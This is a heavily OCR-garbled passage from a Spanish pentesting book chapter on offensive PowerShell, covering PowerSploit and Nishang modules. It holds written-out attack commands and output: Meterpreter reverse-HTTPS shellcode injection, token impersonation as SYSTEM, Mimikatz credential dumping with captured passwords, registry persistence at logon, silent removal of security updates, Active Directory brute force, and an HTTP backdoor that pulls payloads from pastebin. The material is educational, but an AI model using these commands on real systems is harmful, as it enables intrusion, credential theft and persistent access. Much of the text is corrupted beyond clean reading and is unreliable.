recursos  y  devuelve  el  codigo  HTTP  y  la  direccion  URL 

In  voke-ReverseDns- 
Lookup 

Realiza  un  escaneo  a  los  registros  PTR.  Este  modulo  pertenece  al 

modulo  Recon  _ _ — — 

Tabia  3.  27:  Diferentes  funciones  en  PowerSploit. 

I  Vrwvpiiavivn  V1V  M*»^**' #  .  , 

generico  y  un  tercero  para  la  busqueda  de  paneles  dc  admmistracion. 
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Este  modulo  proporciona  funciones  que  permiten  descnsamblar  codigo  nativo  y  managed  oblenicndo 
diferentes  formates.  A  contmuacion  se  enumeran  las  funciones  correspondientes  con  el  modulo: 


Funcion 

Descripci6n 

Get-CSDisassembiy 

Esta  funcion  desensambla  un  binario  devolviendo  un  array  de  bytes 
utilizando  Capstone  Engine  disassembly  Framework 

Get-ILD  is  assembly 

Esta  luncion  desensambla  dc  forma  similar  a  como  lo  haria  ildasm 

Tabia  3. 2S:  Funciones  de  Disassembly  en  PowerShell  Arsenal. 


PowerShell  Arsenal:  Malware  Analysis 

Este  modulo  proporciona  diferentes  funciones  relacionadas  con  el  analisis  de  archives,  generalmcnte 
mbdulo3  dC  ma  WarC' A  contmuacion  sc  describen  las  diferentes  funciones  correspondientes  < 


;  con  este 


Funcion 

Descripcion 

New- Function  Delegate 

Proporciona  un  Wrapper  de  un  ejecutable  para  una  funcion 
en  x86  o  xH6  64 

N e  w-DU Export  Function 

Crea  un  wrapper  de  una  funcion  exportada 

/  nvoke-LoadLibran  - 

Carga  una  DLL  en  el  actual  proceso  de  PowerShell 

Get-HostsFile 

Parsea  y  devuelve  el  contenido  del  fichero  hosts  del  sistema 
Windows 

New-HostsFileEntry 

Esta  funcion  permite  reemplazar  o  anadir  una  entrada  al 
fichero  de  hosts  del  sistema 

Remo  ve-HostsFi/eEntry 

Esta  funcion  permite  eliminar  una  entrada  del  fichero  de 
hosts  del  sistema 

Get- A  ssem  b  ly  'Strings 

Esta  funcion  devuelve  un  output  con  todas  las  strings  de  un 
ejecutable  .NET 

Get-AssemblyResources 

Esta  funcion  extrae  todos  los  recursos  managed  de  un 
ensamblado  .NET 

Get- 

AssemblylmplementedMethods 

Devuelve  todos  los  metodos  de  un  ensamblado  que  estan 
implementados  en  MS1L 

Table  3. 29:  Funciones  de  Malware  Analysis  en  PowerShell  Arsenal. 


^:r:tVniliSk  ?  PrOCeSOS  es  Un  PaS0  “P0*8"*  Para  el  de  la  memora  y  las 

ones  que  han  ocumdo  u  ocurren  en  este  instante  en  un  equipo.  Para  este  tipo  de  situaciones 
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PowerShell  Arsenal  dispone  de  un  modulo  denominado  Memory  Tools,  el  cual  implementa  Ids 


siguientes  tipos  de  funciones. 


Funci6n 

Descripcion 

Get-ProcessStrings 

Esta  funcion  devuelve  como  output  todas  las  strings  imprimibles 
de  un  proceso  que  se  encuentra  cn  memoria 

Get-  VirtualMemorylnfo 

Esta  funcion  cs  un  wrapper  para  kernel 32!  VtrtualQueryEx 

Get- Process  Me morybifo 

Esta  funcion  proporciona  al  usuario  informacion  de  la  memoria 
virtual  para  cada  conjunto  de  paginas  que  se  encuentra  en  la 
memoria.  Esta  funcion  es  similar  a  Ivadutnp  Win  Dbg 

Get-StnictFrom  Memoir 

Esta  funcion  proporciona  dates  de  un  bloque  no  administrado  de 
la  memoria  en  un  proceso  arbitrario 

Tuhla  3 JO:  Funciones  tie  Menton-  Tools  en  PowerShell  Arsenal. 


PowerShell  Arsenal:  Parsers 

Este  modulo  presenta  funciones  que  proporcionan 
en  memoria  o  los  conocidos  como  file  formats, 
describen  a  continuacion. 


la  posibilidad  de  realizar  parseos  sobre  ejecutables 
El  modulo  consta  de  4  funciones.  las  cuales  se 


Funcion 

Descripcion 

Get-PE 

Dumped  un  proceso  y  pcirsea  cl  PE 

Find-Pro  cess  PEs 

Encuentra  archives  PE  en  memoria 

Get-LibSymhols 

Vluestra  los  simbolos  desde  Windows  LIB 

Get-OhjDump 

Muestra  informacion  acerca  de  los  objetos  OBJ  en  Windows 

Tahiti  3.31:  Funciones  tie  Parsers  en  Pow  erShell  Arsenal. 


PowerShell  Arsenah  Windows  Internals 

Este  modulo  proporciona  funciones  que  ayudan  a  obtener  information  a  bajo  nivel  del  sistema 

4-  ......  fAn  nroepninrlii?  a  continuacion. 


Funcion 

Descripcion 

Gei-PEB 

Devuelve  el  PEB  de  un  proccsos.  cs  decir.  el  Process 
Environment  Block 

Regis  ter- Process  Module  Trace 

Resistra  una  traza  de  modulos  cargados 

Get-Process  ModitleTrace 

Muestra  informacion  sobre  los  modulos  cargados  en  los 
procesos 

Unregister-Process  ModuleTrace 

Detiene  la  traza  de  modulos  cargados 

C apititlo  Iff.  PowerShell pum:  El  ar/e  de! pentesting 
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Funcion 

Descripcion 

Get-S\  'stem  Info 

Esta  funcion  es  un  wranner  tin  .  .  , 

- — - i  i  -  —  "Ki+f^ivjeiovsremmjo 

Tabla  3.32:  Funciones  de  Windows  Internals  en  PowerShell  Arsenul. 


e“p~^ 

de  te, A  continuacion  sc  describe,,  las  di, cremes  fifneiones ™ 


Funcion 

Descripcion 

Get-Strings 

Dumpea  las  strings  de  un  fichero  en  formate  Unicode  o  Ascii.  Es  una  replica 

de  la  funcionalidad  de  Sysinternals  strings  e\e 

Get- Member 

Esta  funcion  extiende  el  cmdlct  Get -Member,  la  cual  aflade  el  parametro 

-  i  irate,  el  cual  permite  mostrar  members  no  publieos  He  NET 

ConvertTo-String 

Conviertc  los  bytes  de  un  fichero  a  string 

Get-Entropy 

Calcula  la  entropia  de  un  fichero  o  un  array  de  bytes 

Tuhla  3.33:  Funciones  de  Misv  en  PowerShell  Arsenal 


■  v  « 


En  esta  prueba  de  concepto  se  va  a  trabajar  con  los  modulos  Code  Execution  y  Recon  de  PowerSo/oii 
l^ZZZllZ  dC  COnCePt°  COntCmP,a  13  fase  de  —  y  fingerprinting  y  la 

I  ii  primer  lugar  se  utilizaran  las  funciones  Invoke-Portscan  y  Get-HttpStatus  oara  obtener 

ntomacon  sobre  nna  nraqnina  nrmoB.  Es,a  maquin,  rem„„  Ju  un  gi  „'mero  ”e  on  „„ 

abides  y  seme, os  comendo  en  ella.  El, milizari  esias  funciones  con  cl  Bn  de  obtcnS 

icciii  'T'  I  ITTpl"ll0|'  y  SerVICIOS'  y  por  otm  ,ado  tJtilizara  la  segunda  funcion  con  el  fin  de  encontrar 
retursos  HTTP  y  el  estado  que  se  devuelve  de  estos.  encontrar 

flcxihl^He  diSP°ne  dC  "na  $erie  de  pardmetros’ los  cuales  ofreeen  una  funcionalidad 

flexible  de  d.cha  functon.  A  continuation  se  presenta  un  cuadro  resumen  de  los  parametros  mis 
eresantes  y  las  postbilidades  de  descubrimiento  que  ofrece  la  funcion. 


Descripcion 


Pennite  indicar  diferentes  hosts  en  la  linea  de  comandos  separados  por 
comas.  Este  parametro  soporta  IPv4  CIDR,  por  lo  que  se  pueden  indicar 
redes,  por  ejemplo  80.0.0.0/24 
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Paramctro 

Description 

Host  File 

Permite  indicar  un  fichero  con  los  hosts  a  escanear 

ExcludeHosts 

permite  excluir  hosts  separados  por  coma 

Ports 

Permite  indicar  los  puertos  que  se  quieren  escanear  separados  por  comas. 
Tambien  se  permite  indicar  un  rango  de  puertos.  por  ejemplo  20o00 

PortFile 

Se  indican  los  puertos  desde  un  fichero  de  texto 

TopPorts 

Permite  indicar  el  numero  de  Top  Ports  que  se  quieren  escanear.  Por 

defecto  es  50 

ExcludePorts 

Permite  excluir  los  puertos  indicados  en  este  parametro 

PingOnly 

Deshabilita  el  escaneo  de  puertos  y  realiza  un  escaneo  a  traves  del  proto- 

colo  ICMP 

XmlOut 

Devuelve  en  XML  el  descubnmiento  realizado 

AllformatsOut 

Devuelve  los  rcsultados  en  ficheros  con  diferentes  formates  como  son 

.nmap.  .xml y  .gnmap 

Tabia  3.34 :  Pardmeiros  de  Invoke-Portscan. 


Con  la  information  anterior  se  puede  entender  quc  la  funcion  dispone  de  diferentes  opcioncs. 
entendicndo  esta  funcion  como  bastante  flexible.  Ademas.  el  poder  util.zar  esta  mformacion  en  otras 
hcrramientas  es  un  punto  a  su  favor,  gracias  a  la  exportation  a  ficheros  XML  y  olros  (brmatos,  como 

por  ejemplo  nmap. 


015  15:43=39 


Fig.  3.37:  Descubrimienlo  de  maquinas  en  una  red  a  t  raves  de  ICMP. 


Caprnlo  in.  PowerSheU pw-o:  Elam  ddpentesting 
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respondan  a  ping.  O0-^.i>/24  en  busca  de  maquinas  que 

Ademas  los  objetos  devueltos  por  la  funcion  Invoke-Portscan  son  . 

os  que  han  respondido  a  dicho^wg.  Si  esta  restriceion  no  hubiera  stdoTfi  ' ^  “  mues,ren 

todos  los  objetos  generados.  uno  por  cada  host.  ‘  d°  COnfiSurada  se  mostrarian 

Ahora  se  utilizara  la  funcion  Invoke-Portscan  para  llevar  a  cabo  im  ,=. 

maqu.na  en  concrete.  en  este  caso  la  maquina  con  direccion  IP  199  168  56  102%,  PUm°S  C°" 

visual, zar  en  la  .magen,  la  maquina  tiene  un  gran  numero  de  puertos  abiem  s  ln  \  T’0  56  PUede 

I  ■  ...  qUC  dCben  SCr  eVa'Uad0S  en  la  fase  de  explotcifn  '  3brC  d,ferenles 


nastei*\Recon>  Inuoke-Portsc 


i 


S  D:\libros\pent _ _ 

-Hosts  192.168.56.102  -Ports  20-500 


ostnane  :  192.168.56.102 

alive  :  True 

penPorts  :  <21  29  99  or  ■. 

losedPorts  :  <20'  24'  27'  32’"> 

1  It  e  red  Ports  :  O  '  J 

inisliTine  :  08/08/2015  15:52:58 

j  SpPMS.ope„Poi 

2 
3 

I 

II 
39 
45 


Fig.  3.3ft  Descubrimienlo  de  puertos  abienos  con  Invoke-Portscan. 

Para  finalizar  con  las  fimciones  de  Recon  y  viendo  que  la  maquina  1 99  1 6X  s*  ,mr 

abierto  se  puede  utilizar  la  funcion  Get  HttnRtmu*  r  ,  r  ••  V  '—168.56.102  tiene  el  puerto  80 

»ales  *  described  a  cmilZcZ.  °C  '  H"l’S'a"'s  Esl”  *  «l«unos  para,,*.™.  |os 


Path 


Especifica  la  direccion  web  o  direccion  IP  del  host  rernoto 


Especifica  el  host  remoto 


Tabia  3.35:  Pardmeiros  de  Oei-HitpSiains. 
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En  el  siguiente  ejemplo  se  va  a  reahzar  una  busqueda  obtenidas  con 

192.168.56.102.  En  esta  busqueda  se  va  a  filtrar  por  cU J'Jrecursos  existe  en  el 
codigo  "20*"  seran  las  mostradas,  i,Cual  es  el  objenvo?  Poder  conocer  que 

servrdor  y  se  tiene  acceso  sobre  ellos. 


>q  "OK"> 

Status  URL 


OK  http://192.l68.56.102/dav 


fig  3.39;  Oh  tendon  de  direcdones  URL  de  un  senidor. 


En  resun,en.  se  pu.de  eonseguir  d  W.  de  direcdones  URLy 

-■  por 

Where-Object,  la  cual  se  ha  utilizado  mas  durante  el  desarrollo  del  hbr  . 

us  fcnciones  de  Cd*  £*»-*»-  -an  ditadas  ya  “ 

equipo.  peso  pur  ,0  genera,  se  dltad.  una 

vcz  que  la  explotacion  haya  funcionado. 

Las  tunciones  que  se  presen, an  en  es,»  prueb.  * 

ShellcodeMSIL  e  Invoke-DI (Injection,  as .  os  primu  utiliza  Uamadas  a  funciones 

cure  hn’oke-Shellcode  e  Invoke-ShellcodeMSIL  es  que  A  continuacion  se 

Win3 2  lo  cual  puede  ser  aprovechado  para  ev.tar  un  comportam.ento  sospechoso.  a 

detallan  los  parametros  de  las  funciones  Invoke-Shellcode. 


Parametro 


Description 


ProcessJD 


Shellcode 


Payload 


ListMetasploilPay'ionds 

Lhosf 


Se  puede  indicar  el  ID  del  proceso  donde  inycctar  lashellcode 

Se  puede  especificar  un  army  de  bytes  para  ejecutar  una  shell- 

code _ _ _ 

Se  puede  especificar  que  payload  ulilizar.  Solo  se  dispone, 
actualmente,  de  windows/meterpreter/reversejup  y  windows 

meter  ore  ter /re  vers  e_ht  tps _ 

■  resell  n„ylnnds  sonoilados  de  Menisplob - - 

Indies  cual  es  la  direccion  IP  o  nombre  de  host  donde  se  rec.b.ra 
la  conexion.  Si  los  payloads  son  inverses,  en  este  pammeuo^^ 
pentester  siempre  configurara  una  direccion  su>a  pc 

la  conexion _ -1 


Capa, do  III  PowerShell puro:  £/  arte  del  petnesrmg 


>  use  e  xp  1c  it  /mu  1 1  i  /h  ah'dle 

iH0ST 

®3f  -xPio-M  r)  >  exploit 

sta-c^--”r'Fi  -eyer.se  handier  or.  https://o. 0.0.0:2443/ 

‘-ua“c— ^  t.ie  payload  handler... 

-92.^68. 56. Ill ;25196  Request  received  for  /2-pF 

r  h:??;  /2-fe  — •  • 

1  2O15-02-0S  17:12:13  -0200  **3  >  *9* .-#.56. 101:25146) 

interpreter  >  sysinfo 
--Trputar  ;  r,"* 

:  Wiad°ws  :  (Build  9200.. 

:  x64  (Current  Process  us  WCW60 . 
language  :  £5 

•  — -rpreter  •  xS  6/ Win32 


%.  J.  40:  Obtencion  de  sesidn  de  Meterpreler  con  reverse  https. 
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Por  ultimo,  es  importante  hablar  de  facibnente  inyectable  en 

un  proceso  existente  en  la  maquina  utxhzando  su  PTD.  Una  DLL  p 

un  proceso.  ,  .  , 

in  mfll  ouede  hacer  que  sea  detectada 

ru  i  ser  escrita  en  disco,  lo  cuai  pucu<-  i 

La  unica  desventaja  es  que  la  DLL  dene  ser 

por  los  motores  de  antivirus. 


pvi  -  .  , 

A  continuacibn  .  — »  los  dHta~  pa,amc,ms  ,u.  propomioba  os, a  funcon 


Tahla  3,37:  Parametros  tie  Invoke-Dllltyeciion. 


pen,ester>  LPORT=<puerto  por  el  que  escuchar a  el  handle'  ./ 

Una  vez  se  tiene  generada  la  DLL  sc  1-*^ 

ejemplo  con  Start-Process  notepad.exe  Window  .  Dlllniection  PmcesslD  <mimem 

Tpiof  extremo  hay  que  configurar  e,  handler  de  Melasploi, 

para  recibir  la  concxion.  como  se  ha  visto  en  otros  ejemplos. 

PoC:  Post-Exploitation  con  Exfiltration  +  ^^^persislence_  Respecto 

TimedScreenshot  y  Out-Mimdump. 

u  prime.  funcion  va  a  pcmii.i,  .1  P^,er  "»  q“^“eS1S'" 

tambibn  pudiendo  enumerar  a  bstos.  . 

'g£fJ!S. “;renSt.P^»yT-‘i“  efecuae  co, 

plT tlrtumem r  tokem  y  otilizarlos  se  debcri  ejecta,  como  adn,ims,rador  1.  ses,6n  * 
Power  Shell. 
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pD;Nil'n‘°"PenC'!SLina 


Domain 

Username 

hi o ken 

LogonType 

IsElevated 

TokenType 

Session  ID 

Priui leges Enabled 

Privileges Available 

Process I d 

Domain 

Isername 

liToken 

LogonType 

I sElevated 

rokenType 

Session  ID 

Privileges Enabled 

Privileges Available 

Pro  c  e  s  s  I  d 

lomain 

Isername 

(Token 

.ogonType 

I sElevated 

TokenType 

SessionI D 

Privileges Enabled 

Privileges Available 

Process I d 


NT  AUTHORITV 
SVSTEM 
2064 
0 

True 

Primary 

SeSystenProf ilePriwilege  S«^^—vPriuileae.  S„TohP,.iuilc3e. 

NT  AUTHORITV 
SERUICIO  LOCAL 
2344 
5 

T  rue 
Primary 

^®^VStemti.me Privilege,  SeShutdounPrivilege . . .>  ' 


11  PATHS 

Pablo .Gonzalez 

2024 

2 

True 

Primary 

6004 


Tig.  341:  Emmie  radon  tie  tokens  en  el  sistema. 


Si  dpentester  quiere  ejecutar  un  proceso  con  una  identidad  concreta  podra  utilizar  la  instruccion 
Invoke-  token  Manipulation  C reatePmcess  <pmceso.  por  ejemplo  calc.e.xe>  Username  <domain 
usuario,  por  ejemplo  "nt  authority \systetn  '>. 

Por  mro  lado,  se  puede  impersonalizar  el  proceso  actual  lanzando  la  siguiente  instruccion  Invoke- 
Token  Manipulation  -ImpersonateUser  Username  ‘'nt  author!  tv\system  ” 

La  funcion  Invoke-Token Manipulation  puede  juntarse  con  la  ejecucion  posterior  dc  fnvoke-Mimikatz 
para  extraer  informacion  sensible  de  Lsuss.exe. 

l-a  luncion  Invoke-Mimikalz  permite  cargar  en  memoria  Mimikatz  consiguiendo,  por  ejemplo 
un  dumpeo  de  credenciales  sin  tenor  que  escribir  un  binario  en  disco.  Ademas.  se  puede  ejecutar 

contra  vanas  maqumas.  siempre  y  cuando  se  tenga  el  privilegio  suficiente,  a  traves  del  parametro 
C  ompujerName. 

La  luncion  realtzara  un  dumpeo  de  credenciales  si  es  invocada  con  el  parametro  DumpCreds ,  aunque 
tainbien  puede  realizar  un  dumpeo  de  certificados  de  la  maquina  con  el  parametro  DumpCerts. 

~  cl  Pen,es,er  requiere  lanzar  la  funcion  sobre  varias  maquinas  puede  utilizar  el  parametro 

t  omputerName  de  la  siguiente  forma  ComputerName  @Ceqnipo]  ",  " eqmpo2'\ .  “ equipoN ") 

miukaiz  t.ene  sus  propios  comandos,  por  lo  que  pueden  ser  ejecutados  tambien  a  traves  de  la 
iunuon,  por  ejemplo  Invoke-Mimikatz  Command  "privilege: .debug  exit 
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Authent icat ion  Id  : 
Session  * 

User  Name 
(Domain 

ID  : 

msv  : 

[000000033 

*  Username 

*  Domain 

*  LM 

*  NTLM 

*  SHA1 
tspkg  = 

*  Username 

*  Domain 

-*  Password 
udigest  : 

■w  Username 

*  Domain 

*  Password 
lioessp  • 
kerberos  : 

*  Username 
*-  Domain 

«•  Password 
ssp  : 
credman 


0  ;  64899  <0000000® :0000fd83> 

Interactive  from  1 
Administrator 

§-1-5-21-3507275898-1183418431-608800615-500 

Primary 

:  Administrator 

i  8735 172c  3a?7tl2c65aacd8  4c  d494924f 

:  Administrator 
:  psbell8 
:  I23abc.. 

:  Administrator 
:  pshe 118 

:  123abc . . 

Administrator 
pshe 118 
l  :  123abc . - 


Fig.  3.42:  Dumpeo  de  credenc  idles  con  Mimikato. 

Tras  vertodo  =1  potencial  que  oltae  MrMc  u  «6n  ”r 

real  ice  esta  opcracion  en  un  equipo  con  acceso  fisico. 

U  funcion  pertnite  recoup,  **»£«  en  ^ 

disco.  U  sintaxia  «  sencilla  Geo  WW»/»  fce„„*y„rdcm,fc,,. 

Por  Utitno.  queda  fcneion  MHN  con  la  que  e,  SE£ 

memoria  dc  un  proceso  a  disco.  Esta  Umcion  sc  l'tl“'Pa  .  ^  E[  rjmc|.  parametro  indica  el 

ruta  se  almacenara  el  volcado. 


^sr-sSa^K^r *=== 

l  “  o.  c — 

lezSDesktop\dunp 

Directories  C:\Users\pgon2ale2\Desktop\dump 

Mode  LastWriteTine  Length  Name 

Pi.  lS/08/2015  1=26  62662993  notepad_3888  .dnp 

PS  D:\librosNpcntesting 


FUr  3.43:  Obtencidn  de  i 


Capituh  ///.  PowerShell  pwo:  /:/  arte  e/e/  pe  West  mg 


Una  vezobtemdo  el  volcado  de  memoria  sepuedetratar  nor  eiemnin  .  i  ,• 

nene  una  funcion  identica  a  la  herramienta  strings.exe  En  la  imlen  T  “  T'°"  Gel'S,ri"^  t|llc 
cl  notepad  que  ha  sido  volcado  se  habia  escrito  un  texto  que  contenia  halloa  ^  *" 

password  que  se  estuviera  almacenando  en  un  fichero  de  texto  r™  IctP  b  •  P°drfa  ser  L,n 
realizar  vokados  de  memoria  puede  provocar  que  informacISn cue J %  *  ^  m°Strar  ^  d 
y  no  esta  protegida  quede  a  la  vista  del pentester.  1  mra  en  memona  RAM 


s 


:\Users\pgon2ale2\Desktop\dump>str 


pass wo r 
|c  pas  sword: 
pass wo 

password:  123abc. 
epassword:  123abc 


xngs  notepad_3888  .drip  | 


Fig.  3.44.  I  isualizacion  del  volcado  de  memoria 


En  el  modulo  Persistent?  se  trataran  2  ftinciones,  como  son  New- User, Pers ,  ,, 
Persistence  La  primera  funcion  configure  las  opciones  con  las  que  se  quiere  dotar  de  persistcncia 
a  un  script,  para  que  poster.ormente  la  funcion  Add-Persistence  la  afiada.  La  funcidn  New 
User  Pers  istenceOption  presenta  los  siguientes  parametros: 


Paranietro 

Descripcion 

ScheduledTask 

La  via  de  persistence  sera  a  traves  de  una  tarea  programada.  Es  un 
para  metro  de  tipo  switch 

Registry 

La  via  de  persistencia  sera  a  traves  del  registro.  La  ruta  donde  se 

almacenarfes/fflra/tfO^ 

Run-  Es  un  paranietro  de  tipo  switch 

Daily 

- El  /wto^rfeomenzara  diariamente.  Es  un  paranietro  de  tipo  switch 

At 

E\  pa)’load arrancara  o  ejeculara  en  un  tiempo  especifico.  Se  debe 

especificar  en  un  formato  como ‘12:54  AM’,  '1  AM’.  ‘22:00  00’  o  •7-2'>-'>6 

PM’ 

Onldle 

El  pavoad serd  ejccutado  despues  de  un  minuto  de  inactividad  en  la 
maquina.  El  parametro  es  de  tipo  switch 

AtLogon 

El  payload  se  ejeculara  cuando  un  usuario  inicie  sesion.  El  parametro  es  de 

tipo  switch 

Tahh  3.38:  Pardmenm  de  lafimeidn  New-UserPenhtenceOption. 


•  aid 


pj  ucua 


conccpio  se  utnizara  una  via  de  persistence  como  es  el  registro  y  sc  indicara 
que  cl  payload  sc  ejccute  en  cada  inicio  de  sesion.  Estas  opciones  se  almacenaran  en  una  variable 

U  inStrucci6n  para  8enerar  las  opciones  sera  Sopciones  - 
new-  Usei  P et sistenceOptton  -Registry  -AtLogon.  f 


uso  dp  aaa  p  •  '  F  - .  e  y  “,,,,acenaaas  en  una  variable  se  puede  hacer 

-SaLm  i  T'  C^°  CJ!mp  °  SC  PrCSema  'a  s'Buiente  inslmccion  Add-Persistence 

-  np, Block  <comandos>  -ElevatedPersistenceOption  SEIevatedOptions  -UserPersistenceOption 
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forma  similar  a  como  lo  hacc  NewUserPersisleaceOption. 

Esta  as  una  manera  sene, II.  d.  rlomr  de  parsislenci.  a tavern J^TySS 
la  posibilidad  da  renar  permisoa  da  asuarm  o  |«i> os mas alav dm rto. »an  /ontenido. 

■ — 

contenido  para  que  no  sea  tan  visible. 


6.Nishang 

Nlshcma  as  an/—  .  — 

intrusion.  m*m  habilita  .1  uso  da  payload,  ,  da  conjun,„ 

last  de  intrusion  contemplando  diferentes  fasas  de  este.  -  direcciOn  URL  domic  se 

da  herramientas  que  puadan  sar  u.ilizados  para  la  w 

puede  dascarpi  Nishcmg  es  hltps-J/glthub.comlsamralashak/mthang. 

Htitmt  esta  compuasto  por  difarantas  mOdnlos  qua  forman  *  frame**  *">“•  L“  diferen,cs 
modulos  son  descritos  a  continuacion: 

a.i.  Webs  hell  Este  modulo  proporciona  la  posibilidad  de  utilizat  una  nt  ’.s  ;c  quu 
dascC  y'  sttL»,  ajacuta  coLmlos  y  cjecura  'Crip*  da  l»M  an  la  mamona 

''am  Esta  modulo  proporaion.  difarantas 
Se  utilizan  diferentes  protocolos  y  mecanismos  para  ms  a  «. 

puedan  ejecutar  instrucciones  a  traves  de  ellos.  .  . 

r/tef.  Crea  archivos  en  diferentes  formates,  como  pueden  ser  Hint/,  -M*.  y 

inya^ra  insoucailas  da  IW*M.  Esta  modulo  a,  interest, e  para  uttltrar  la  v„  da, 
usuario  y  el  archivo  malicioso  que  ejecuta  instrucciones. 

.  Escalation.  Esta  mOdulo  proporciona  2  funciones  qua  ayudan  a  consegu.r  alavacon 

ftmeiones  qua  ayudan  al  pea, eater  a  dasca^rsa 
tZZ I^»ai0;  da  cOdtgo  son 

-  Gather.  Esta  mOdulo  proporciona  funciones  qua  ayudan  ‘f ^°»bred 
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In voke- Mimikatz Wdiges t Downgrade  la  cual  dumpeara  contrasenas  Entmft„i  , 

Windows  8. 1  y  Windows  Server  2012.  3S  en  text0  Plano  dc  sistemas 

-  Pivot.  Este  modulo  proporciona  funciones  que  ayudan  a  reili^r  ™ 

maquinas con  el  objetivo de  lograr pivotar entre  ellas  Porejemplo  senuvl  °"C*  enlK 
sasionas  de  PowaoSAa// con  otras  maquinas.  copiar  y  ajacmm'bbiarios  sobre  otn^mOquinas'o 
crear  relays  de  red  entre  dtferentes  equipos.  Uno  de  los  modulos  imprcscindiWesTlaZ 
ex plotacion  de  cualquier  test  de  intrusion.  p 

-  Prasadhak.  Este  modulo  consta  de  una  funcion.  la  cual  chequea  los  hashes  dc  procesos 
que  se  estan  ejecutando  cn  la  maquina  contra  la  base  de  datos  de  Pints  Total. 

-  Scan.  Este  modulo  proporciona  un  escaner  de  puertos  y  una  funcion  para  llevar  a  eabo 
practicas  de  fuerza  bruta  a  diferentes  protocolos  y  servicios. 


Powerpreter.  Este  modulo  es  especial,  ya  que  contempla  toda  la  funcionalidad  de  Nishum 
en  un  modulo  importable  desde  PowerShell.  Si  se  visualiza  el  codigo  fuente  del  modulo  se 
puede  ver  como  todas  las  funciones  de  los  distintos  modulos  se  agrupan  en  este  modulo. 

Shells.  Este  modulo  proporciona  dilerentes  funciones  que  ayudan  a  obtener  shells  a 
traves  de  diferentes  protocolos.  Las  shells  que  se  obtienen.  en  la  mayoria  de  los  casos  son 
PowerShell  mteractivas,  lo  cual  es  algo  muy  util  en  la  post-explotacion.  Algunos  de  los 
protocolos  que  pueden  ser  utilizados  son  TCP.  UDP.  ICMP  o  HTTP. 

Utility.  Este  modulo  proporciona  diferentes  funciones  a  modo  de  utilidades  Estas 
utilidades  pueden  ser  utilizadas  durante  diferentes  fases  del  test  de  intrusion,  por  lo  que  se 
pueden  ver  como  funciones  extra,  pero  utiles. 


Prasadhak,  Scan,  Escalation  y  Antak 

Estos  4  modulos  ban  sido  agrupados  debido  a  que  estan  compuestas  por  una  cantidad  baia  de 


*  * —  — cjucr  cj etiuan  en  ei 

s.stema  y  ver.ficarlos  contra  la  base  de  datos  de  VmtsTotal.  El  modulo  scan  proporciona  funciones 
para  realizar  un  escaneo  de  puertos  y  acciones  de  fuerza  bruta.  que  aunque  no  sea  la  mejor  solucion. 
puede  ser  valida  en  algunos  escenarios  bajo  ciertas  condiciones.  El  tercer  modulo.  Escalation 
proporciona  funciones  rclacionadas  con  la  esealada  de  privilegio.  Por  ultimo,  Antak  proporciona  la 
posibilidad  de  utilizar  una  webshelL  A  continuacion  se  deseriben  las  funciones  que  componen  estos 
4  modulos  en  la  siguiente  tabla  resumen: 


Funcion 

Descripcion 

Antak 

Antak  es  una  webshell  escrita  en  ASP.Kct  el  cual  utiliza  PowerShell.  Cada_ 
comando  es  ejecutado  en  nuevo  proceso 

Enable - 

Duplicate  Token 

Esta  funcion  lanza  un  payload  que  permite  duplicar  el  Access  token  de  Isass. 

E\ payload debe  ser  ejecutado  con  permisos  elevados 
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Funcion 

Description 

Remove- 

Update 

Esta  funcion  elimina  actualizaciones  del  sistema  de  forma  silenciosa.  El  primer 
ejemplo  es  Remove-Update  All.  el  cual  elimina  todas  las  actualizaciones  del 
sistema.  El  segundo  ejemplo  es  Remove-Update  Security,  el  cual  ciunina  las 
actualizaciones  de  seguridad  de  la  maquina.  El  tercer  ejemplo  es  Remo\e 
Update  KB2761226.  el  cual  elimina  la  actualizacion  KB2  61226 

Prasadhak 

Esta  funcion  calcula  el  hash  MD5  de  los  procesos  que  se  cjecutan  en  la 
maquina  y  los  contrasts  contra  la  base  de  dato  de  VirusTotal.  Un  ejemplo  cs 
Prasadhak  —APIKey  <  API  Key  > 

Brute-Force 

Esta  funcion  realiza  un  alaque  de  fuerza  bruta  contra  SQL  Serve,.  Active 
Directory.  Web  o  FTP.  Un  ejemplo  seria  Invoke- Brute  Force  -ComputerName 
tan(etdomam.com  -UserList  C:\users.txt  -PasswordList  C:\wordlist.txt 
-Service  ActiveDirectory  -SlopOnSuccess.  Este  ejemplo  lanza  fuerza  bruta 
contra  el  directorio  activo,  utilizando  un  listado  de  usuarios  y  un  listado  de 

contrasenas 

Port-Scan 

Esta  funcion  realiza  un  escaneo  de  direcciones  IP,  nombres  de  host  y  puertos 
abiertos  en  la  red.  Un  ejemplo  seria  Por, -Scan  -Star, Address  192.168.0.1 
-EndAddress  192.168.0.254  -ResolveHost  -Scan Port. 

Tablet  3.39  Fund  ones  de  Prasadhak.  Scan.  Escalation  vAntak  cn  Nislumg. 


Backdoors 

Esta  categoria  agrupa  funciones  que  pueden  ser  utilizadas  para  instalar  backdoors  en  el  cqu.pa 
consiguiendo  ejecutar  instrucciones  a  traves  do  diferentes  protocol.  conn,  por  ejemplo  H™  o 
DNS  Las  funciones  son  realmente  utiles  en  algunos  entomos.  como  por  ejemplo  donde  el  pentestm 
liene  acceso  fisico  y  necesita  descargarsc  los  scripts  a  traves  de  un  protocolo  perm.tido  como  el 
DNS.  o  un  entomo  donde  el  pent  ester  necesita  instalar  una  backdoor  pain  po  er  vo  ver  a 
instrucciones.  A  continuacion  se  enumeran  las  diferentes  funciones  que  constttuyen  en  este  mo  u  o. 


Funcion 

Description 

HTTP-Backdoor 

Esta  funcion  ejecuta  un  payload  el  cual  realiza  una  consults  a  una 
direction  URL  la  cual  contiene  una  magic  siring.  Si  el  magic  string  que 
introduce  el  pentester  coincide  con  el  del  parametro  CheckURL  se  eargara 
el  modulo  o  funcion  al  que  se  apunta  con  el  parametro  PayloadURL. 

El  argumento  Arguments  indica  que  funcion  se  cjecutara  de  todas  las 
que  puedan  existir  en  PayloadURL  A  continuacion  se  muestra  un 
ejemplo  sencillo  HTTP-Backdoor  -CheckURL  http://pastebin.cam/nnv 
php?i=jqP2vJ3x  -PayloadURL  http://pastebin.com/raw.php ?i-Zh)j8n\v 
-Arguments  Get-Information  -MagicString start!23  -StopString stopthts__ 
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Funcion 

Description 

DNS_  TXT_P\vncige 

L,m,  runcion  proporciona  la  forma  de  realise  consults  a  reuisiros  TV  I 

implementados  en  un  servidor  DNS.  Se  deben  confimmr  i  ®  X 

o  e„  d  in,™  *  ,„s  resislros  TXTnde7SX 

servido  .  t»  del  rqj.stro  TXT  del  servidor  DNS  se  debe  ee'wlr  f 
traves  de  Out-Dns Txt,  el  cual  se  encuentra  en  1»  . .*  .w/ 

Execute-OnTime 

- -  cn  id  catcgoria  (  nhtv 

